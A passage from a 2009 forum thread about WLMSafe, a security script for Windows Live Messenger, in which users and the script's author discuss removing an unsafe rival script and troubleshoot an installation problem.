In such cases that policy is seriously flawed and actually harms the user and an exception should be made. Even if the malicious script has been removed from the official DB, it might still float around other download sites. Enforcing that policy to the letter makes that people using scripts like WLMSafe are not protected to such particular scripts.
- My comments about uploading scripts to online scanners is still valid.
- Last point, see private forum.
RE: WLM Safe 4.0 - What is this! by wta121 on 05-26-2009 at 11:37 AM
This script sounds really good for me, but it won't work!
When I click to install it, it works, but then it says that parts of it are locked and I need to restart messenger! So I click OK, then a few moments later, I get this attached message. I've tried again and again and it won't work! This script sounds really good, can someone help me please!
RE: WLM Safe 4.0 - What is this! by wincy on 05-26-2009 at 11:57 AM
I just want you to know that i made a function that removes CilaSmartSecurity only because it is an unsafe script and also because that script had a similar function.
I never wanted to delete other script only because are similar to mine or comes in conflict with it!
However that function there is no longer in version 5.0.
What's in private forum about Cila? Here is the author:
http://foro.msgpluslive.es/member.php?action=profile&uid=16822
"The best programs you can imagine are created with the worst intentions." he says...
wta121, what's in Script Debug window?
Does it give you any error? What Messenger version do you have?
PM me
RE: RE: WLM Safe 4.0 - What is this! by CookieRevised on 05-26-2009 at 01:30 PM
quote: Originally posted by wincy
I just want you to know that i made a function that removes CilaSmartSecurity only because it is an unsafe script and also because that script had a similar function.
I never wanted to delete other script only because are similar to mine or comes in conflict with it!
However that function there is no longer in version 5.0.
Those are all the right reasons imho and thus I find it too bad that you had to remove that function, because that script from Cila is still available on 3rd party sites.
quote: Originally posted by wincy
What's in private forum about Cila?
Not so much about Cila itself, but more about the general issue.